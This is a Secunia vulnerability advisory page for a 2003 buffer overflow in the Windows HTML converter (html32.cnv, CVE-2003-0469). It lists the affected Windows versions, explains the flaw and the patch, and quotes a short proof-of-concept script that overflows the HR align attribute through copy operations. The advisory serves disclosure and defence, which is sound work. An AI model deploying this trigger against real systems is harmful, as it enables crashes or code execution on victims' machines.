Secunia CSI 5.0
Overview
Advisories
Research
Forums
Create Profile
Our Commitment
Database
Search
Advisories by Product
Advisories by Vendor
Terminology
Report Vulnerability
Insecure Library Loading

Secunia Advisory SA9113

Microsoft Windows HTML Converter Buffer Overflow Vulnerability
Secunia Advisory SA9113
DOWNLOAD CSI


DOWNLOAD PSI
Release Date 2003-06-25
Last Update 2003-07-12
   
Popularity 17,745 views
Comments 0 comments

Criticality level Highly criticalHighly critical
Impact DoS
System access
Where From remote
Authentication level Available in Customer Area
   
Report reliability Available in Customer Area
Solution Status Vendor Patch
   
Systems affected Available in Customer Area
Approve distribution Available in Customer Area
Remediation status Secunia CSI, Secunia PSI
Automated scanning Secunia CSI, Secunia PSI
   
Operating System
Microsoft Windows 2000 Advanced Server
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Server
Microsoft Windows 98
Microsoft Windows 98 Second Edition
Microsoft Windows Millenium
Microsoft Windows NT 4.0 Server
Microsoft Windows NT 4.0 Server, Terminal Server Edition
Microsoft Windows NT 4.0 Workstation
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Web Edition
Microsoft Windows XP Home Edition
Microsoft Windows XP Professional

Secunia CVSS Score Available in Customer Area
CVE Reference(s) CVE-2003-0469 CVSS available in Customer Area
  

Description

A vulnerability has been identified in all supported Windows versions, which can be exploited by malicious people to compromise a vulnerable system.

The vulnerability is caused due to a boundary error in "html32.cnv", when handling conversion requests during cut-and-paste operations. One attack vector is through a HTML document containing specially crafted script code, which will cause a buffer overflow when viewed in Internet Explorer.

Successful exploitation allows execution of arbitrary code on the user's system with the user's privileges, but requires that the user is tricked into visiting a malicious web site or view a malicious HTML based email.

The following example was provided in the original advisory. It opens a new window and then adds a horizontal rule (using <HR> tag) with an overly long argument supplied to the "align" attribute. The content is then copied and the window is closed, which triggers the overflow.

<script>
wnd=open("about:blank","","");
wnd.moveTo(screen.Width,screen.Height);
WndDoc=wnd.document;
WndDoc.open();
WndDoc.clear();
buffer="";
for(i=1;i<=127;i++)buffer+="X";
buffer+="DigitalScream";
WndDoc.write("<HR align='"+buffer+"'>");
WndDoc.execCommand("SelectAll");
WndDoc.execCommand("Copy");
wnd.close();
</script>


NOTE: Internet Explorer on Windows Server 2003 runs in "Enhanced Security Configuration" by default and therefore prevents the vulnerability from being exploited automatically. However, if this has been disabled, the vulnerability can be exploited.


Solution
Apply patch via WindowsUpdate or manually.
Further details available in Customer Area

Provided and/or discovered by
Discovered by: Digital Scream.
PoC released by: 3APA3A.

Changelog
Further details available in Customer Area

Original Advisory
http://www.microsoft.com/technet/security/bulletin/MS03-023.asp

Other references
Further details available in Customer Area

Deep Links
Links available in Customer Area


Do you have additional information related to this advisory?

Please provide information about patches, mitigating factors, new versions, exploits, faulty patches, links, and other relevant data by posting comments to this Advisory. You can also send this information to vuln@secunia.com

Subject: Microsoft Windows HTML Converter Buffer Overflow Vulnerability
 
No posts yet

-

You must be logged in to post a comment.




 Products Solutions Customers Partner Resources Company
 
 Corporate
Vulnerability Intelligence Manager (VIM)
Corporate Software Inspector (CSI)
Consumer
Personal Software Inspector (PSI)
Online Software Inspector (OSI)
 Industry
Compliance
Technology
Integration
 Customers
Testimonials
 VARS
MSSP
Technology Partners
References
 Factsheets
Reports & Papers
Webinars
Events
 About us
Careers
Memberships
Newsroom


 
© 2002-2012 Secunia ApS - Rued Langgaards Vej 8, 4th floor, DK-2300 Copenhagen, Denmark - +45 7020 5144
Terms & Conditions and Copyright - Privacy - Report Vulnerability